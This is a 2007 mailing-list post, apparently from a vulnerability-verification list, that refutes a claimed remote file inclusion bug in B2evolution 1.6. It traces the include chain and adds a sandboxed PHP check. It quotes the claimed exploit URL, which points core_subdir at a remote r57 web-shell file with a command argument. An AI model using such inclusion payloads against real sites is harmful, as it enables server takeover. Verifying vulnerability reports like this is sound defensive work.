[VIM] false: B2evolution 1.6 RFi

GM darkfig gmdarkfig at gmail.com
Sun Apr 15 12:47:23 UTC 2007


Link: http://www.securityfocus.com/archive/1/465733/30/0/threaded
Author: k4rtal[at]gmail[dot]com

Quote from the thread:
"script_path/blogs/index.php?core_subdir=http://shelladresi,.com/r57.txt?cmd=id"

Even if there was a vulnerability, RFI is not possible.
And there is no LFI.

index.php:
require_once dirname(__FILE__).'/evocore/_main.inc.php';

_main.inc.php:
require_once dirname(__FILE__).'/../conf/_config.php';

_config.php:
require_once  dirname(__FILE__).'/_advanced.php';

_advanced.php:
$core_subdir = 'evocore/';
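
The argument above, as an added example (not part of the original post and not b2evolution's own code): it recreates the four quoted statements in a temporary directory, then checks that no include target contains a variable and that a request-supplied core_subdir is replaced by the assignment in _advanced.php. It assumes the claimed vector depends on register_globals, which is emulated with extract(); the sandbox path, the function name and the request value are constructed.

```php
<?php
// Added illustration, not b2evolution code. Sandbox path, function name and
// request value are constructed; register_globals is emulated with extract().

// The four statements quoted in the post, one per file.
$files = [
    'index.php'             => "require_once dirname(__FILE__).'/evocore/_main.inc.php';",
    'evocore/_main.inc.php' => "require_once dirname(__FILE__).'/../conf/_config.php';",
    'conf/_config.php'      => "require_once dirname(__FILE__).'/_advanced.php';",
    'conf/_advanced.php'    => "\$core_subdir = 'evocore/';",
];

$root = sys_get_temp_dir() . '/vim_include_chain_' . getmypid();
mkdir("$root/evocore", 0700, true);
mkdir("$root/conf", 0700, true);
foreach ($files as $rel => $stmt) {
    file_put_contents("$root/$rel", "<?php\n$stmt\n");
}

// Check 1: does any include target contain a variable at all?
$dynamic = array_filter($files, fn($s) => preg_match('/^require(_once)?\b.*\$/', $s) === 1);

// Check 2: what does $core_subdir hold once the chain has run?
function core_subdir_after_include(string $index, array $request): string
{
    // With register_globals=On, request parameters exist as variables before
    // the script's first line runs; extract() reproduces that here.
    extract($request);
    require $index;   // included files share this function's variable scope
    return $core_subdir;
}

$request = ['core_subdir' => 'http://example.invalid/x.txt?'];   // constructed
$final   = core_subdir_after_include("$root/index.php", $request);

printf("include targets containing a variable: %d\n", count($dynamic));
printf("core_subdir from request             : %s\n", $request['core_subdir']);
printf("core_subdir after include chain      : %s\n", $final);
echo $final === 'evocore/' && count($dynamic) === 0
    ? "request value is overwritten before the quoted chain finishes\n"
    : "request value can influence the include chain\n";

// Remove the sandbox.
foreach (array_keys($files) as $rel) {
    unlink("$root/$rel");
}
rmdir("$root/evocore");
rmdir("$root/conf");
rmdir($root);
```

The check covers only the four quoted lines; any other file that reads $core_subdir before _advanced.php has been loaded would need the same review.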

